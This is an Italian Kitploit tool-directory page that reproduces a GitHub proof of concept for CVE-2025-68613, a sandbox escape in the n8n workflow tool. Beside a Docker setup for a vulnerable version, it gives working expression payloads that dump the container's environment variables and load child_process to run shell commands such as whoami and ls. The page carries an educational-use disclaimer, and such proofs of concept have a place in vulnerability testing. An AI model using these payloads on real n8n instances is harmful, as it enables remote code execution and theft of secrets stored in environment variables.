Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
poc_CVE-2025-68613 — PoC per CVE-2025-68613 | Kitploit
Strumenti/GitHubGitHub/reem-012/poc_cve-2025-68613
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubreem-012/poc_cve-2025-68613

poc_CVE-2025-68613

PoC per CVE-2025-68613

Vedi Repository
8 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC: n8n Sandbox Escape (CVE-2025-68613)

Solo a scopo educativo Questa Proof of Concept dimostra una vulnerabilità critica (CVE-2025-68613) in n8n. Non utilizzarla su sistemi di cui non sei proprietario o per cui non hai esplicita autorizzazione.

Panoramica della vulnerabilità

Le versioni di n8n precedenti alla 1.122.0 contengono una vulnerabilità di esecuzione di codice remoto (RCE). Utenti autenticati possono bypassare la sandbox delle espressioni ed eseguire codice arbitrario sul sistema host tramite payload JavaScript specifici nell'editor di espressioni dei workflow.

1. Configurare l'ambiente vulnerabile

Crea un volume dati ed esegui una versione vulnerabile di n8n (es. v1.120.0).

root@kitploit:~
# Crea il volume per la persistenza
docker volume create n8n_data

# Esegui l'istanza vulnerabile di n8n
docker run -it --rm \
  --name n8n \
  -p 5678:5678 \
  -v n8n_data:/home/node/.n8n \
  n8nio/n8n:1.120.0

2. Passaggi per la riproduzione

Accedere all'interfaccia

Naviga su http://localhost:5678 e completa la configurazione iniziale se necessario.

Creare un workflow

Clicca su "Add Workflow" per iniziare un workflow vuoto.

Aggiungere un nodo vulnerabile

Aggiungi un nodo Set al workflow. Questo nodo permette di definire valori che possono essere valutati come espressioni.

Configurare l'espressione

Nel nodo Set, modifica un parametro (es. value) e cambia il tipo di input in Expression.

3. Payload di sfruttamento

Inserisci i seguenti payload nell'editor di espressioni per dimostrare la vulnerabilità.

Payload 1: Dump delle variabili d'ambiente

Questo payload accede a this.process.env per divulgare variabili d'ambiente sensibili dal container.

Payload:

root@kitploit:~
{{ (function() {
  return JSON.stringify(this.process.env, null, 2);
})() }}

Risultato:

Payload 2: Esecuzione di codice remoto (whoami)

Questo payload bypassa la sandbox accedendo a process.mainModule.require per caricare il modulo child_process, consentendo l'esecuzione di comandi arbitrari sul sistema.

Payload:

root@kitploit:~
{{ (function() {
  const require = this.process.mainModule.require;
  const { execSync } = require('child_process');
  return execSync('whoami').toString();
})() }}

Risultato: Verifica il contesto utente del processo in esecuzione.

Payload 3: RCE completo (Elenca directory root)

Dimostra la capacità di navigare nel filesystem.

Payload:

root@kitploit:~
{{ (function() {
  const require = this.process.mainModule.require;
  const { execSync } = require('child_process');
  return execSync('ls -la /').toString();
})() }}

Risultato:

Scarica lo strumento